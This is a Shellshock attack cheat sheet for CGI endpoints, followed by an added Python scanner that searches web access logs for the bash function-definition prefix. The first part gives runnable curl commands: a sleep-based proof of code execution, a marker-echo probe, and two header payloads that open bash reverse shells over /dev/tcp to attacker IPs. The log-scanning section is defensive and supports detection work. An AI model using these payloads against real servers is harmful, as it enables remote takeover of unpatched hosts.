
CGI

shellshock

(step 1) - Testing for shellshock
Most tests echo a marker string and expect that string to come back in the web response. If you think a host may be vulnerable, enumerate all its CGI pages and test each of them.

nmap $(target) -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test.cgi
(step 2) - PoC that we have RCE (you could also make the target ping or send a web request to you and monitor for it with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://11.22.33.44/cgi-bin/test.cgi
(step 3) - Reverse shell
curl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/10.10.16.2/4444 <&1"' https://11.22.33.44/test.cgi

other

reflected

curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
Out-of-band: use the Cookie header as an alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
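From the defender's side, every variant on this page (User-Agent, Cookie, reflected marker, out-of-band callback) leaves the same trace: a header value starting with the bash function-definition prefix `() {` sent to a CGI handler. The following is an added example, not part of the original cheat sheet, that scans Apache combined-format access log lines for that prefix in the User-Agent, Referer, request line and an optional trailing Cookie field (logged with `%{Cookie}i` in a custom LogFormat, which is an assumption about the server config). The log lines are constructed for the example; the field names and the `is_cgi_path` heuristic are mine.

```python
import re
from typing import Dict, List, Optional

# Combined log format plus an optional appended quoted Cookie field (assumed custom LogFormat).
# Quoted fields may contain backslash-escaped quotes, as Apache writes them.
_Q = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>' + _Q + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + _Q + r')" "(?P<agent>' + _Q + r')"'
    r'(?: "(?P<cookie>' + _Q + r')")?$'
)

# Shellshock trigger: an environment value beginning with a bash function definition.
# Whitespace between "()" and "{" is optional in the variants seen in the wild.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Heuristic for paths that are likely handled by a CGI/script interpreter.
CGI_PATH_RE = re.compile(r'/cgi-bin/|\.(?:cgi|sh|pl)(?:\?|$)', re.IGNORECASE)

# Constructed sample log lines (not real traffic): a benign request, a reflected probe in
# User-Agent, a Cookie-carried payload, and the same pattern against a static page.
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Sep/2014:10:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Sep/2014:10:01:09 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 27 "-" "() { :; }; echo VULNERABLE"',
    '203.0.113.5 - - [24/Sep/2014:10:01:15 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "-" "curl/7.35.0" "() { :;}; /bin/bash -i"',
    '203.0.113.5 - - [24/Sep/2014:10:01:20 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "() { :; }; id"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access log line into named fields; None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def shellshock_fields(entry: Dict[str, str]) -> List[str]:
    """Names of the header-derived fields in this entry that carry the '() {' prefix."""
    hits = []
    for field in ("agent", "referer", "cookie", "request"):
        if SHELLSHOCK_RE.search(entry.get(field) or ""):
            hits.append(field)
    return hits


def request_path(request: str) -> str:
    """Extract the path from a request line such as 'GET /cgi-bin/x.cgi HTTP/1.1'."""
    parts = request.split(" ")
    return parts[1] if len(parts) >= 2 else request


def is_cgi_path(path: str) -> bool:
    return bool(CGI_PATH_RE.search(path))


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per log line that carries a Shellshock-style header value.

    cgi_target marks whether the path looks like a CGI handler, i.e. whether the
    request could actually have reached bash; a hit on a static path is still worth
    recording as scanning activity from that source.
    """
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # unparsable line: leave it for a separate malformed-line report
        hits = shellshock_fields(entry)
        if not hits:
            continue
        path = request_path(entry["request"])
        findings.append({
            "ip": entry["ip"],
            "time": entry["time"],
            "path": path,
            "status": entry["status"],
            "fields": hits,
            "cgi_target": is_cgi_path(path),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "CGI" if f["cgi_target"] else "non-CGI"
        print(f"{f['time']} {f['ip']} {f['path']} [{flag}] status={f['status']} in={','.join(f['fields'])}")
```

A successful reflected probe shows up as a 200 with a small body on a CGI path; an out-of-band payload typically shows as a 500 or a hung request, so the status alone does not decide anything and the header match is the primary signal. Patching bash (the fix for CVE-2014-6271 and its follow-ups) removes the root cause; the log scan is for finding who tried and which handlers were exposed.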